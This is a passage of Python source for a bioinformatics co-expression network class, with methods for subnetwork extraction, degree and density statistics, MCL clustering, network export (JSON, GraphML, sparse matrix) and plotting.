gene_list is all genes in COB object (self).
sig_only : bool
A flag to include only significant interactions.
min_distance : bool (default: None)
If not None, only include interactions that are
between genes that are a `min_distance` away from
one another.
filter_missing_gene_ids : bool (default: True)
Filter out gene ids that are not in the current
COB object (self).
trans_locus_only : bool (default: True)
Filter out gene interactions that are not in Trans,
this argument requires that locus attr object has
the 'parent_locus' key:val set to distinguish between
cis and trans elements.
names_as_index : bool (default: True)
Include gene names as the index.
names_as_cols : bool (default: False)
Include gene names as two columns named 'gene_a' and 'gene_b'.
Returns
-------
A pandas.DataFrame containing the edges. Columns
include score, significant (bool), and inter-genic distance.
"""
num_genes = self.num_genes()
if gene_list is None:
# Return the entire DataFrame
df = self._coex_DataFrame(sig_only=sig_only)
else:
# Extract the ids for each Gene
gene_list = set(sorted(gene_list))
ids = np.array([self._expr_index[x.id] for x in gene_list])
if filter_missing_gene_ids:
# filter out the Nones
ids = np.array([x for x in ids if x is not None])
if len(ids) == 0:
df = pd.DataFrame(columns=["score", "significant", "distance"])
else:
# Grab the coexpression indices for the genes
ids = PCCUP.coex_index(ids, num_genes)
df = self._coex_DataFrame(ids=ids, sig_only=sig_only)
del ids
if min_distance is not None:
df = df[df.distance >= min_distance]
if names_as_index or names_as_cols or trans_locus_only:
names = self._expr.index.values
ids = df.index.values
if len(ids) > 0:
ids = PCCUP.coex_expr_index(ids, num_genes)
df.insert(0, "gene_a", names[ids[:, 0]])
df.insert(1, "gene_b", names[ids[:, 1]])
del ids
del names
else:
df.insert(0, "gene_a", [])
df.insert(0, "gene_b", [])
if names_as_index and not names_as_cols:
df = df.set_index(["gene_a", "gene_b"])
if trans_locus_only:
try:
parents = {x.id: x.attr["parent_locus"] for x in gene_list}
except KeyError as e:
raise KeyError(
"Each locus must have 'parent_locus'"
" attr set to calculate trans only"
)
df["trans"] = [
parents[gene_a] != parents[gene_b]
for gene_a, gene_b in zip(
df.index.get_level_values(0), df.index.get_level_values(1)
)
]
return df
def trans_locus_density(
self,
locus_list,
flank_limit,
return_mean=True,
bootstrap=False,
by_gene=False,
iter_name=None,
):
"""
Calculates the density of edges which span loci. Must take in a locus
list so we can exlude cis-locus interactions.
Parameters
----------
locus_list : iter of Loci
an iterable of loci
flank_limit : int
The number of flanking genes passed to be pulled out
for each locus (passed onto the refgen.candidate_genes method)
return_mean : bool (default: True)
If false, raw edges will be returned
bootstrap : bool (default: False)
If true, candidate genes will be bootstrapped from the COB
reference genome
by_gene : bool (default: False)
Return a per-gene breakdown of density within the subnetwork.
iter_name : str (default: None)
Optional string which will be added as a column. Useful for
keeping track of bootstraps in an aggregated data frame.
Returns
-------
Z-score of interactions if return_mean is True
otherwise a dataframe of trans edges
"""
# convert to list of loci to lists of genes
if not bootstrap:
genes_list = self.refgen.candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
else:
genes_list = self.refgen.bootstrap_candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
# Extract the edges for the full set of genes
edges = self.subnetwork(
genes_list,
min_distance=0,
sig_only=False,
trans_locus_only=True,
names_as_index=True,
)
if by_gene == True:
# Filter out trans edges
gene_split = pd.DataFrame.from_records(
chain(
*[
((gene_a, score), (gene_b, score))
for gene_a, gene_b, score, *junk in edges[edges.trans == True]
.reset_index()
.values
]
),
columns=["gene", "score"],
)
gene_split = gene_split.groupby("gene").agg(np.mean)
if iter_name is not None:
gene_split["iter"] = iter_name
gene_split.index.name = "gene"
gene_split["num_trans_edges"] = len(edges)
return gene_split
else:
if return_mean:
scores = edges.loc[edges["trans"] == True, "score"]
return np.nanmean(scores) / (1 / np.sqrt(len(scores)))
else:
return edges.loc[edges["trans"] == True,]
def trans_locus_locality(
self,
locus_list,
flank_limit,
bootstrap=False,
by_gene=False,
iter_name=None,
include_regression=False,
):
"""
Computes a table comparing local degree to global degree
of genes COMPUTED from a set of loci.
NOTE: interactions from genes originating from the same
locus are not counted for global or local degree.
Parameters
----------
locus_list : iterable of camoco.Loci
A list or equivalent of loci
flank_limit : int
The number of flanking genes passed to be pulled out
for each locus (passed onto the refgen.candidate_genes method)
bootstrap : bool (default: False)
If true, candidate genes will be bootstrapped from the COB
reference genome
iter_name : object (default: none)
This will be added as a column. Useful for
generating bootstraps of locality and keeping
track of which one a row came from after catting
multiple bootstraps together.
by_gene : bool (default: False)
Return a per-gene breakdown of density within the subnetwork.
include_regression : bool (default: False)
Include the OLS regression residuals and fitted values
on local ~ global.
Returns
-------
A pandas DataFrame with local, global and residual columns
based on linear regression of local on global degree.
"""
# convert to list of loci to lists of genes
if not bootstrap:
genes_list = self.refgen.candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
else:
genes_list = self.refgen.bootstrap_candidate_genes(
locus_list,
flank_limit=flank_limit,
chain=True,
include_parent_locus=True,
)
# self.log("Found {} candidate genes", len(genes_list))
# Get global and local degree for candidates
gdegree = self.global_degree(genes_list, trans_locus_only=True)
ldegree = self.local_degree(genes_list, trans_locus_only=True)
# Merge the columns
degree = ldegree.merge(gdegree, left_index=True, right_index=True)
degree.columns = ["local", "global"]
degree = degree.sort_values(by="global")
degree.index.name = "gene"
if include_regression:
# Add the regression lines
loc_deg = degree["local"]
glob_deg = degree["global"]
ols = sm.OLS(loc_deg.astype(float), glob_deg.astype(float)).fit()
degree["resid"] = ols.resid
degree["fitted"] = ols.fittedvalues
degree = degree.sort_values(by="resid", ascending=False)
if iter_name is not None:
degree["iter"] = iter_name
return degree
def density(self, gene_list, min_distance=None, by_gene=False):
"""
Calculates the density of the non-thresholded network edges
amongst genes within gene_list. Includes parameters to perform
measurements for genes within a certain distance of each other.
This corrects for cis regulatory elements increasing noise
in coexpression network.
Parameters
----------
gene_list : iter of Loci
List of genes from which to calculate density.
min_distance : int (default: None)
Ignore edges between genes less than min_distance
in density calculation.
by_gene : bool (default: False)
Return a per-gene breakdown of density within the subnetwork.
Returns
-------
A network density OR density on a gene-wise basis
"""
# filter for only genes within network
edges = self.subnetwork(gene_list, min_distance=min_distance, sig_only=False)
if by_gene == True:
x = pd.DataFrame.from_records(
chain(
*[
((gene_a, score), (gene_b, score))
for gene_a, gene_b, score, sig, dis in edges.reset_index().values
]
),
columns=["gene", "score"],
)
return x.groupby("gene").agg(np.mean)
else:
if len(edges) == 0:
return np.nan
if len(edges) == 1:
return edges.score[0]
return np.nanmean(edges.score) / (1 / np.sqrt(len(edges)))
def to_dat(self, gene_list=None, filename=None, sig_only=True, min_distance=0):
"""
Outputs a .DAT file (see Sleipnir library)
"""
if filename is None:
filename = self.name + ".dat"
with open(filename, "w") as OUT:
# Get the score table
self.log("Pulling the scores for the .dat")
score = self.subnetwork(
gene_list,
sig_only=sig_only,
min_distance=min_distance,
names_as_index=False,
names_as_cols=False,
)
# Drop unecessary columns
score.drop(["distance", "significant"], axis=1, inplace=True)
# Find the ids from those
self.log("Finding the IDs")
names = self._expr.index.values
ids = PCCUP.coex_expr_index(score.index.values, self.num_genes())
score.insert(0, "gene_a", names[ids[:, 0]])
score.insert(1, "gene_b", names[ids[:, 1]])
del ids
del names
# Print it out!
self.log("Writing the .dat")
score.to_csv(
OUT, columns=["gene_a", "gene_b", "score"], index=False, sep="\t"
)
del score
self.log("Done")
def to_graphml(self, file, gene_list=None, sig_only=True, min_distance=0):
"""
"""
# Get the edge indexes
self.log("Getting the network.")
edges = self.subnetwork(
gene_list=gene_list,
sig_only=sig_only,
min_distance=min_distance,
names_as_index=False,
names_as_cols=False,
).index.values
# Find the ids from those
names = self._expr.index.values
edges = PCCUP.coex_expr_index(edges, self.num_genes())
df = pd.DataFrame(index=np.arange(edges.shape[0]))
df["gene_a"] = names[edges[:, 0]]
df["gene_b"] = names[edges[:, 1]]
del edges
del names
# Build the NetworkX network
self.log("Building the graph.")
net = nx.from_pandas_dataframe(df, "gene_a", "gene_b")
del df
# Print the file
self.log("Writing the file.")
nx.write_graphml(net, file)
del net
return
def to_json(
self,
gene_list=None,
filename=None,
sig_only=True,
min_distance=None,
max_edges=None,
remove_orphans=True,
ontology=None,
include_coordinates=True,
invert_y_coor=True,
min_degree=None,
include_edges=True
):
"""
Produce a JSON network object that can be loaded in cytoscape.js
or Cytoscape v3+.
Parameters
----------
gene_list : iterable of Locus objects
These loci or more specifically, genes,
must be in the COB RefGen object,
they are the genes in the network.
filename : str (default None)
If specified, the JSON string will be output to
file.
sig_only : bool (default: True)
Flag specifying whether or not to only
include the significant edges only. If
False, **All pairwise interactions** will
be included. (warning: it can be large).
min_distance : bool (default: None)
If specified, only interactions between
genes larger than this distance will be
included. This corrects for potential
cis-biased co-expression.
max_edges : int (default: None)
If specified, only the maximum number of
edges will be included. Priority of edges
is assigned based on score.
remove_orphans : bool (default: True)
Remove genes that have no edges in the
networ#.
ontology :#camoco.Ontology (default: None)
If an ontology is specified, genes will
be annotated to belonging to terms within
the ontology. This is useful for highlighting
groups of genes once they are inside of
cytoscape(.js).
include_coordinates : bool (default: True)
If true, include coordinates for available
genes. Genes without calculated coordinates will
be left blank.
invert_y_coor : boor (default: True)
If True, the y-coordinate will be inverted (y=-1*y).
For some reason Cytoscape has an inverted y-coordinate
system, toggling this will fix it.
Returns
-------
A JSON string or None if a filename is specified
"""
net = {"nodes": [], "edges": []}
# calculate included genes
if gene_list is None:
gene_list = self.genes()
# Filter by minimum degree
if min_degree is not None:
included = set(self.degree.query(f'Degree >= {min_degree}').index)
gene_list = [x for x in gene_list if x.id in included]
# Get the edge indexes
self.log("Getting the network.")
edges = self.subnetwork(
gene_list=gene_list,
sig_only=sig_only,
min_distance=min_distance,
names_as_index=False,
names_as_cols=True,
)
if max_edges != None:
# Filter out only the top X edges by score
edges = edges.sort_values(by="score", ascending=False)[0:max_edges]
if include_coordinates == True:
# Create a map with x,y coordinates
coor = self.coordinates()
if invert_y_coor:
coor.y = -1*coor.y
coor_map = {
id:coor for id,coor in zip(coor.index,zip(coor.x,coor.y))
}
# Add edges to json data structure
if include_edges:
for source, target, score, distance, significant in edges.itertuples(
index=False
):
net["edges"].append(
{
"data": {
"source": source,
"target": target,
"score": float(score),
"distance": float(fix_val(distance)),
}
}
)
# Handle any ontological business
if ontology != None:
# Make a map from gene name to ontology
ont_map = defaultdict(set)
for term in ontology.iter_terms():
for locus in term.loci:
ont_map[locus.id].add(term.id)
parents = defaultdict(list)
# generate the subnetwork for the genes
if gene_list == None:
gene_list = list(self.refgen.iter_genes())
else:
gene_list = set(gene_list)
if remove_orphans == True:
# get a list of all the genes with edges
has_edges = set(edges.gene_a).union(edges.gene_b)
gene_list = [x for x in gene_list if x.id in has_edges]
for gene in gene_list:
node = {"data": {"id": str(gene.id), "classes": "gene"}}
if ontology != None and gene.id in ont_map:
for x in ont_map[gene.id]:
node["data"][x] = True
node["data"].update(gene.attr)
if include_coordinates:
try:
pos = coor_map[gene.id]
except KeyError:
pos = (0,0)
node['position'] = {
"x" : pos[0],
"y" : pos[1]
}
net["nodes"].append(node)
# Return the correct output
net = {"elements": net}
if filename:
with open(filename, "w") as OUT:
print(json.dumps(net), file=OUT)
del net
else:
net = json.dumps(net)
return net
def to_sparse_matrix(
self, gene_list=None,
min_distance=None,
max_edges=None,
remove_orphans=False
):
"""
Convert the co-expression interactions to a
scipy sparse matrix.
Parameters
-----
gene_list: iter of Loci (default: None)
If specified, return only the interactions among
loci in the list. If None, use all genes.
min_distance : int (default: None)
The minimum distance between genes for which to consider
co-expression interactions. This filters out cis edges.
max_edges : int (default: None)
If specified, only the maximum number of
edges will be included. Priority of edges
is assigned based on score.
remove_orphans : bool (default: True)
Remove genes that have no edges in the
network.
Returns
-------
A tuple (a,b) where 'a' is a scipy sparse matrix and
'b' is a mapping from gene_id to index.
"""
from scipy import sparse
self.log("Getting genes")
# first get the subnetwork in pair form
self.log("Pulling edges")
edges = self.subnetwork(
gene_list=gene_list,
min_distance=min_distance,
sig_only=True,
names_as_cols=True,
names_as_index=False,
)
# Option to limit the number of edges
if max_edges is not None:
self.log("Filtering edges")
edges = edges.sort_values(by="score", ascending=False)[
0 : min(max_edges, len(edges))
]
# Create a gene index
self.log("Creating Index")
if gene_list == None:
gene_list = list(self.refgen.iter_genes())
else:
gene_list = set(gene_list)
gene_index = {g.id: i for i, g in enumerate(gene_list)}
nlen = len(gene_list)
# Option to restrict gene list to only genes with edges
if remove_orphans:
self.log("Removing orphans")
not_orphans = set(edges.gene_a).union(edges.gene_b)
gene_list = [g for g in gene_list if g.id in not_orphans]
self.log(f"Removed {len()}")
# get the expression matrix indices for all the genes
row = [gene_index[x] for x in edges.gene_a.values]
col = [gene_index[x] for x in edges.gene_b.values]
data = list(edges.score.values)
# Make the values symmetric by doubling everything
# Note: by nature we dont have cycles so we dont have to
# worry about the diagonal
self.log("Making matrix symmetric")
d = data + data
r = row + col
c = col + row
self.log("Creating matrix")
matrix = sparse.coo_matrix((d, (r, c)), shape=(nlen, nlen), dtype=None)
return (matrix, gene_index)
def mcl(
self,
gene_list=None,
I=2.0,
min_distance=None,
min_cluster_size=0,
max_cluster_size=10e10,
):
"""
Returns clusters (as list) as designated by MCL (Markov Clustering).
Parameters
----------
gene_list : a gene iterable
These are the genes which will be clustered
I : float (default: 2.0)
This is the inflation parameter passed into mcl.
min_distance : int (default: None)
The minimum distance between genes for which to consider
co-expression interactions. This filters out cis edges.
min_cluster_size : int (default: 0)
The minimum cluster size to return. Filter out clusters smaller
than this.
max_cluster_size : float (default: 10e10)
The maximum cluster size to return. Filter out clusters larger
than this.
Returns
-------
A list clusters containing a lists of genes within each cluster
"""
import markov_clustering as mc
matrix, gene_index = self.to_sparse_matrix(gene_list=gene_list)
# Run MCL
result = mc.run_mcl(
matrix,
inflation=I,
verbose=True
)
clusters = mc.get_clusters(result)
# MCL traditionally returns clusters by size with 0 being the largest
clusters = sorted(clusters, key=lambda x: len(x), reverse=True)
# Create a dictionary to map ids to gene names
gene_id_index = {v: k for k, v in gene_index.items()}
result = []
for c in clusters:
if len(c) < min_cluster_size or len(c) > max_cluster_size:
continue
# convert to loci
loci = self.refgen.from_ids([gene_id_index[i] for i in c])
result.append(loci)
return result
def _mcl_legacy(
self,
gene_list=None,
I=2.0,
scheme=7,
min_distance=None,
min_cluster_size=0,
max_cluster_size=10e10,
):
"""
A *very* thin wrapper to the MCL program. The MCL program must
be accessible by a subprocess (i.e. by the shell).
Returns clusters (as list) as designated by MCL.
Parameters
----------
gene_list : a gene iterable
These are the genes which will be clustered
I : float (default: 2.0)
This is the inflation parameter passed into mcl.
scheme : int in 1:7
MCL accepts parameter schemes. See mcl docs for more details
min_distance : int (default: None)
The minimum distance between genes for which to consider
co-expression interactions. This filters out cis edges.
min_cluster_size : int (default: 0)
The minimum cluster size to return. Filter out clusters smaller
than this.
max_cluster_size : float (default: 10e10)
The maximum cluster size to return. Filter out clusters larger
than this.
Returns
-------
A list clusters containing a lists of genes within each cluster
"""
# output dat to tmpfile
tmp = self._tmpfile()
self.to_dat(
filename=tmp.name,
gene_list=gene_list,
min_distance=min_distance,
sig_only=True,
)
# build the mcl command
cmd = "mcl {} --abc -scheme {} -I {} -o -".format(tmp.name, scheme, I)
self.log("running MCL: {}", cmd)
try:
p = Popen(cmd, stdout=PIPE, stderr=sys.stderr, shell=True)
self.log("waiting for MCL to finish...")
sout = p.communicate()[0]
p.wait()
self.log("MCL done, Reading results.")
if p.returncode == 0:
# Filter out cluters who are smaller than the min size
return list(
filter(
lambda x: len(x) > min_cluster_size
and len(x) < max_cluster_size,
# Generate ids from the refgen
[
self.refgen.from_ids(
[gene.decode("utf-8") for gene in line.split()]
)
for line in sout.splitlines()
],
)
)
else:
if p.returncode == 127:
raise FileNotFoundError()
else:
raise ValueError("MCL failed: return code: {}".format(p.returncode))
except FileNotFoundError as e:
self.log(
'Could not find MCL in PATH. Make sure its installed and shell accessible as "mcl".'
)
def local_degree(self, gene_list, trans_locus_only=False):
"""
Returns the local degree of a list of genes
Parameters
----------
gene_list : iterable (co.Locus object)
a list of genes for which to retrieve local degree for. The
genes must be in the COB object (of course)
trans_locus_only : bool (default: False)
only count edges if they are from genes originating from
different loci. Each gene MUST have 'parent_locus' set in
its attr object.
"""
subnetwork = self.subnetwork(
gene_list, sig_only=True, trans_locus_only=trans_locus_only
)
if trans_locus_only:
subnetwork = subnetwork.ix[subnetwork.trans]
local_degree = pd.DataFrame(
list(Counter(chain(*subnetwork.index.get_values())).items()),
columns=["Gene", "Degree"],
).set_index("Gene")
# We need to find genes not in the subnetwork and add them as degree 0
# The code below is ~optimized~
# DO NOT alter unless you know what you're doing :)
degree_zero_genes = pd.DataFrame(
[(gene.id, 0) for gene in gene_list if gene.id not in local_degree.index],
columns=["Gene", "Degree"],
).set_index("Gene")
return pd.concat([local_degree, degree_zero_genes])
def global_degree(self, gene_list, trans_locus_only=False):
"""
Returns the global degree of a list of genes
Parameters
----------
gene_list : iterable (co.Locus object)
a list of genes for which to retrieve local degree for. The
genes must be in the COB object (of course)
trans_locus_only : bool (default: False)
only count edges if they are from genes originating from
different loci. Each gene MUST have 'parent_locus' set in
its attr object.
"""
try:
if isinstance(gene_list, Locus):
if trans_locus_only:
raise ValueError("Cannot calculate cis degree on one gene.")
return self.degree.loc[gene_list.id].Degree
else:
degree = self.degree.ix[[x.id for x in gene_list]].fillna(0)
if trans_locus_only:
degree = degree - self.cis_degree(gene_list)
return degree
except KeyError as e:
return 0
def cis_degree(self, gene_list):
"""
Returns the number of *cis* interactions for each gene in the gene
list. Two genes are is *cis* if they share the same parent locus.
**Therefore: each gene object MUST have its 'parent_locus' attr set!!**
Parameters
----------
gene_list : iterable of Gene Objects
"""
subnetwork = self.subnetwork(gene_list, sig_only=True, trans_locus_only=True)
# Invert the trans column
subnetwork["cis"] = np.logical_not(subnetwork.trans)
subnetwork = subnetwork.ix[subnetwork.cis]
local_degree = pd.DataFrame(
list(Counter(chain(*subnetwork.index.get_values())).items()),
columns=["Gene", "Degree"],
).set_index("Gene")
# We need to find genes not in the subnetwork and add them as degree 0
# The code below is ~optimized~
# DO NOT alter unless you know what you're doing :)
degree_zero_genes = pd.DataFrame(
[(gene.id, 0) for gene in gene_list if gene.id not in local_degree.index],
columns=["Gene", "Degree"],
).set_index("Gene")
return pd.concat([local_degree, degree_zero_genes])
def locality(self, gene_list, iter_name=None, include_regression=False):
"""
Computes the merged local vs global degree table
Parameters
----------
gene_list : iterable of camoco.Loci
A list or equivalent of loci
iter_name : object (default: none)
This will be added as a column. Useful for
generating bootstraps of locality and keeping
track of which one a row came from after catting
multiple bootstraps together.
include_regression : bool (default: False)
Include the OLS regression residuals and fitted values
on local ~ global.
Returns
-------
A pandas DataFrame with local, global and residual columns
based on linear regression of local on global degree.
"""
global_degree = self.global_degree(gene_list)
local_degree = self.local_degree(gene_list)
degree = global_degree.merge(local_degree, left_index=True, right_index=True)
degree.columns = ["global", "local"]
degree = degree.sort_values(by="global")
if include_regression:
# set up variables to use astype to aviod pandas sm.OLS error
loc_deg = degree["local"]
glob_deg = degree["global"]
ols = sm.OLS(loc_deg.astype(float), glob_deg.astype(float)).fit()
degree["resid"] = ols.resid
degree["fitted"] = ols.fittedvalues
degree = degree.sort_values(by="resid", ascending=False)
if iter_name is not None:
degree["iter_name"] = iter_name
return degree
""" ----------------------------------------------------------------------
Cluster Methods
"""
def cluster_genes(self, cluster_id):
"""
Return the genes that are in a cluster
Parameters
----------
cluster_id: str / int
The ID of the cluster for which to get the gene IDs.
Technically a string, but MCL clusters are assigned
numbers. This is automatically converted so '0' == 0.
Returns
-------
A list of Loci (genes) that are in the cluster
"""
ids = self.clusters.query(f"cluster == {cluster_id}").index.values
return self.refgen[ids]
def cluster_coordinates(
self,
cluster_number,
nstd=2,
min_ratio=1.618
):
"""
Calculate the rough coordinates around an MCL
cluster.
Returns parameters that can be used to draw an ellipse.
e.g. for cluster #5
>>> from matplotlib.patches import Ellipse
>>> e = Ellipse(**self.cluster_coordinates(5))
"""
# Solution inspired by:
# https://stackoverflow.com/questions/12301071/multidimensional-confidence-intervals
# Get the coordinates of the MCL cluster
coor = self.coordinates()
gene_ids = [x.id for x in self.cluster_genes(cluster_number)]
points = coor.loc[gene_ids]
points = points.iloc[np.logical_not(np.isnan(points.x)).values, :]
# Calculate stats for eigenvalues
pos = points.mean(axis=0)
cov = np.cov(points, rowvar=False)
def eigsorted(cov):
vals, vecs = np.linalg.eigh(cov)
order = vals.argsort()[::-1]
return vals[order], vecs[:, order]
vals, vecs = eigsorted(cov)
theta = np.degrees(np.arctan2(*vecs[:, 0][::-1]))
width, height = 2 * nstd * np.sqrt(vals)
if min_ratio:
small_axis,big_axis = sorted([width,height])
if big_axis / small_axis < min_ratio:
small_axis = big_axis / min_ratio
if width < height:
width = small_axis
else:
height = small_axis
return {"xy": pos, "width": width, "height": height, "angle": theta}
def cluster_expression(self,
min_cluster_size=10,
max_cluster_size=10e10,
normalize=True
):
"""
Get a matrix of cluster x accession gene expression.
Each row represents the average gene expression in each accession
for the genes in the cluster.
Parameters
----------
min_cluster_size : int (default:10)
Clusters smaller than this will not be included in the
expression matrix.
normalize : bool (default:True)
If true, each row will be standard normalized meaning that
0 will represent the average (mean) across all accessions
and the resultant values in the row will represent the number
of standard deviations from the mean.
Returns
-------
A DataFrame containing gene expression values. Each row represents
a cluster and each column represents an accession. The values of
the matrix are the average gene expression (of genes in the cluster)
for each accession.
"""
# Extract clusters
dm = (
self.clusters.groupby("cluster")
.filter(lambda x: len(x) >= min_cluster_size and len(x) <= max_cluster_size)
.groupby("cluster")
.apply(lambda x: self.expr(genes=self.refgen[x.index]).mean())
)
if normalize:
dm = dm.apply(lambda x: (x - x.mean()) / x.std(), axis=1)
if len(dm) == 0:
self.log.warn("No clusters larger than {} ... skipping", min_cluster_size)
return None
return dm
def import_coordinates_from_cyjs(
self,
cyjs_path,
invert_y_coor=True
):
'''
Import node coordinates from a cyjs file.
Parameters
----------
cyjs_path : str (Pathlike)
Path the cytoscape JSON file
invert_y_coor : bool (default: True)
If True, the y-coordinate will be inverted (y=-1*y).
For some reason Cytoscape has an inverted y-coordinate
system, toggling this will fix it.
'''
cyjs = json.load(open(cyjs_path,'r'))
pos = pd.DataFrame(
[(n['data']['id_original'].upper(), n['position']['x'], n['position']['y']) \
for n in cyjs['elements']['nodes']],
columns=['gene','x','y']
)
if invert_y_coor:
pos['y'] = -1*pos['y']
index = pos['gene']
pos = pos[['x','y']]
pos.index = index
self._bcolz("coordinates", df=pos)
def coordinates(
self,
method='spring',
iterations=10,
force=False,
max_edges=10e100,
lcc_only=True,
):
"""
Returns x,y coordinates for (a subset of) genes in the network.
If coordinates have not been previously calculated OR the force
kwarg is True, gene coordinates will be calculated using the
ForceAtlas2 algorithm. NOTE: by default
"""
from fa2 import ForceAtlas2
pos = self._bcolz("coordinates")
if pos is None or force == True:
import scipy.sparse.csgraph as csgraph
import networkx
A, i = self.to_sparse_matrix(remove_orphans=False, max_edges=max_edges)
# generate a reverse lookup for index to label
rev_i = {v: k for k, v in i.items()}
num, ccindex = csgraph.connected_components(A, directed=False)
# convert to csc
self.log(f"Converting to compressed sparse column")
L = A.tocsc()
if lcc_only:
self.log("Extracting largest connected component")
lcc_index, num = Counter(ccindex).most_common(1)[0]
L = L[ccindex == lcc_index, :][:, ccindex == lcc_index]
self.log(f"The largest CC has {num} nodes")
# get labels based on index in L
(lcc_indices,) = np.where(ccindex == lcc_index)
labels = [rev_i[x] for x in lcc_indices]
else:
labels = [rev_i[x] for x in range(L.shape[0])]
self.log("Calculating positions")
if method == 'spring':
coordinates = nx.layout._sparse_fruchterman_reingold(
L,
iterations=iterations
)
elif method == 'forceatlas2':
forceatlas2 = ForceAtlas2(
# Behavior alternatives
outboundAttractionDistribution=True,
linLogMode=False,
adjustSizes=False,
edgeWeightInfluence=1.0,
# Performance
jitterTolerance=0.1,
barnesHutOptimize=True,
barnesHutTheta=0.6, #1.2,
multiThreaded=False,
# Tuning
scalingRatio=2.0,
strongGravityMode=True,
gravity=0.1,
# Logging
verbose=True,
)
coordinates = positions = forceatlas2.forceatlas2(
L, pos=None, iterations=iterations
)
pos = pd.DataFrame(coordinates)
pos.index = labels
pos.columns = ["x", "y"]
self._bcolz("coordinates", df=pos)
return pos
""" ----------------------------------------------------------------------
Plotting Methods
"""
def plot_network(
self,
filename=None,
target_genes=None,
target_gene_alpha=0.5,
ax=None,
include_title=True,
# coordinate kwargs
force=False,
lcc_only=True,
max_edges=None,
min_degree=None,
iterations=100,
# cluster kwargs
draw_clusters=True,
color_clusters=True,
label_clusters=True,
label_size=20,
min_cluster_size=100,
max_cluster_size=10e100,
max_clusters=None,
cluster_std=1,
cluster_line_width=2,
# style kwargs
node_size=20,
edge_color='k',
edge_alpha=0.7,
draw_edges=False,
background_color='#2196F3',#'xkcd:dark',
foreground_color='#BD0000'#"xkcd:crimson"
):
'''
Plot a "hairball" image of the network.
'''
from matplotlib.colors import XKCD_COLORS
xkcd = XKCD_COLORS.copy()
coor = self.coordinates(lcc_only=lcc_only, force=force, iterations=iterations)
# Filter by degree
if min_degree is not None:
coor = coor.loc[self.degree.query(f'Degree >= {min_degree}').index]
if ax is None:
fig = plt.figure(facecolor="white", figsize=(8, 8))
ax = fig.add_subplot(111)
# Plot the background genes
ax.set_facecolor("white")
ax.grid(False)
ax.set_xticks([])
ax.set_yticks([])
# Plot edges
if draw_edges:
self.log("Plotting edges")
edges = self.subnetwork(
gene_list=self.refgen.from_ids(
coor.index.values
)
).reset_index()
if max_edges is not None:
max_edges = min(max_edges,len(edges))
edges = edges.sort_values(by="score", ascending=False)[0:max_edges]
# Extract the coordinates for edges
a_coor = coor.loc[edges.gene_a]
b_coor = coor.loc[edges.gene_b]
#Plot using a matplotlib lines collection
lines = LineCollection(
zip(zip(a_coor.x,a_coor.y),zip(b_coor.x,b_coor.y)),
colors=edge_color,
antialiased=(1,),
alpha=edge_alpha
)
lines.set_zorder(1)
ax.add_collection(lines)
ax.scatter(
coor.x,
coor.y,
alpha=1,
color=background_color, #xkcd.pop(background_color),
s=node_size
)
# Plot the genes
if target_genes is not None:
self.log("Plotting genes")
ids = coor.loc[[x.id for x in target_genes if x.id in coor.index]]
nodes = ax.scatter(
ids.x,
ids.y,
color=foreground_color,
s=node_size,
alpha=target_gene_alpha
)
nodes.set_zorder(2)
# Plot clusters
if draw_clusters:
from matplotlib.patches import Ellipse
big_clusters = [
k
for k, v in Counter(self.clusters.cluster).items()
if v > min_cluster_size
and v < max_cluster_size
]
# define cluster colors
cluster_colors = list(xkcd.values())
for i, clus in enumerate(big_clusters):
if max_clusters is not None and i + 1 > max_clusters:
break
ids = [x.id for x in self.cluster_genes(clus) if x.id in coor.index]
ccoor = coor.loc[ids]
if color_clusters:
# This will overwrite the genes in the cluster giving them colors
ax.scatter(
ccoor.x,
ccoor.y,
s=node_size,
color=cluster_colors[i]
)
try:
c = self.cluster_coordinates(
clus,
nstd=cluster_std
)
except (KeyError,np.linalg.LinAlgError) as e:
continue
c.update(
{
"edgecolor": "black",
"fill" : False,
"linestyle": ":",
"linewidth": cluster_line_width,
}
)
e = Ellipse(**c)
ax.add_artist(e)
if label_clusters:
ax.annotate(
clus,
size=label_size,
xy=(c['xy']['x'],c['xy']['y']),
bbox=dict(boxstyle="round", fc="w")
)
if include_title:
ax.set_title(self.name,size='large')
if filename is not None:
plt.savefig(filename)
return ax
def plot_heatmap(
self,
filename=None,
ax=None,
genes=None,
accessions=None,
gene_normalize=True,
raw=False,
cluster_method="ward",
include_accession_labels=None,
include_gene_labels=None,
avg_by_cluster=False,
min_cluster_size=10,
max_cluster_size=10e10,
cluster_accessions=True,
plot_dendrogram=True,
nan_color=None,
cmap=None,
expr_boundaries=3.5,
figsize=(20,20)
):
"""
Plots a heatmap of genes x expression.
Parameters
----------
filename : str
If specified, figure will be written to output filename
genes : co.Locus iterable (default: None)
An iterable of genes to plot expression for
accessions : iterable of str
An iterable of strings to extract for expression values.
Values must be a subset of column values in expression matrix
gene_normalize: bool (default: True)
normalize gene values in heatmap to show expression patterns.
raw : bool (default: False)
If true, raw expression data will be used. Default is to use
the normailzed, QC'd data.
cluster_method : str (default: 'single')
Specifies how to organize the gene axis in the heatmap. If
'mcl', genes will be organized by MCL cluster. Otherwise
the value must be one of the linkage methods defined by
the scipy.cluster.hierarchy.linkage function: [single,
complete, average, weighted, centroid, median, ward].
https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
include_accession_labels : bool (default: None)
Force the rendering of accession labels. If None, accession
lables will be included as long as there are less than 30.
include_gene_lables : bool (default: None)
Force rendering of gene labels in heatmap. If None, gene
labels will be rendered as long as there are less than 100.
avg_by_cluster : bool (default: False)
If True, gene expression values will be averaged by MCL cluster
showing a single row per cluster.
min_cluster_size : int ( default: 10)
If avg_by_cluster, only cluster sizes larger than min_cluster_size
will be included.
cluster_accessions : bool (default: True)
If true, accessions will be clustered
plot_dendrogram : bool (default: True)
If true, dendrograms will be plotted
nan_color : str (default: None)
Specifies the color of nans in the heatmap. Changing this
to a high contrast color can help identify problem areas.
If not specified, nans will be the middle (neutral) value
in the heatmap.
cmap : str (default: 'viridis')
A matplotlib color map for the heatmap. See
https://matplotlib.org/gallery/color/colormap_reference.html
for options.
expr_boundaries : int (default: 3)
Set the min/max boundaries for expression values so that
the cmap colors aren't dominated by outliers
Returns
-------
a populated matplotlib figure object
"""
# These are valid hierarchical clustering methods
hier_cluster_methods = [
"single",
"complete",
"average",
"weighted",
"centroid",
"median",
"ward",
]
# Get the Expressiom Matrix
if avg_by_cluster == True:
dm = self.cluster_expression(
min_cluster_size=min_cluster_size,
max_cluster_size=max_cluster_size,
normalize=True
)
else:
